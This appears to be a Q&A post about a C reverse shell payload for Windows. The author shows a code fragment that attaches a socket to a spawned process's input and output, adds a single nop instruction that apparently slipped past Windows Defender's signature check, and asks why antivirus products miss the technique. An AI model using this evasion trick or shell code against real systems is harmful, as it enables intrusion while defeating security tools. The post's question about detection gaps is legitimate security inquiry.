# Tweaking a reverse shell payload not detected?

Tags: c, security, shellcode

Recently started looking at a Windows [reverse shell written in C](https://gist.github.com/mrexodia/ff921d366f62d162f4041f4b39146318) and adapted it into my own [reverse shell payload](https://pastebin.com/zUM498BT).

However, initially running the shell program was denied. Thinking it was Windows Defender doing some kind of signature based scanning, the workaround was to add a single [**nop**](https://en.wikipedia.org/wiki/NOP_(code)) instruction as follows:

```
        #define nop __asm _emit 0x90
        ...
        ...
        ...
        memset(&sinfo, 0, sizeof(sinfo));
        sinfo.cb = sizeof(sinfo);
        sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
        sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)clientSocket;
        nop  // Avoid AV signatures?
        CreateProcessA(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
        WaitForSingleObject(pinfo.hProcess, INFINITE);
        CloseHandle(pinfo.hProcess);
        CloseHandle(pinfo.hThread);
        closesocket(clientSocket);
        WSACleanup();
```

Bingo! The reverse shell connected to 127.0.0.1:666

[image]

**Question**
That specific reverse shell payload technique is known for at least 20 years,
so why do many modern anti-virus products fail to flag it as potentially dangerous code?
For example, [VirusTotal](https://www.virustotal.com/gui/file/47a82f5f7d9178ab9bd3f8cad514597ce50318d6d098b7179c797a120bd532e3) reported 11/67 security vendors flagged this file as malicious.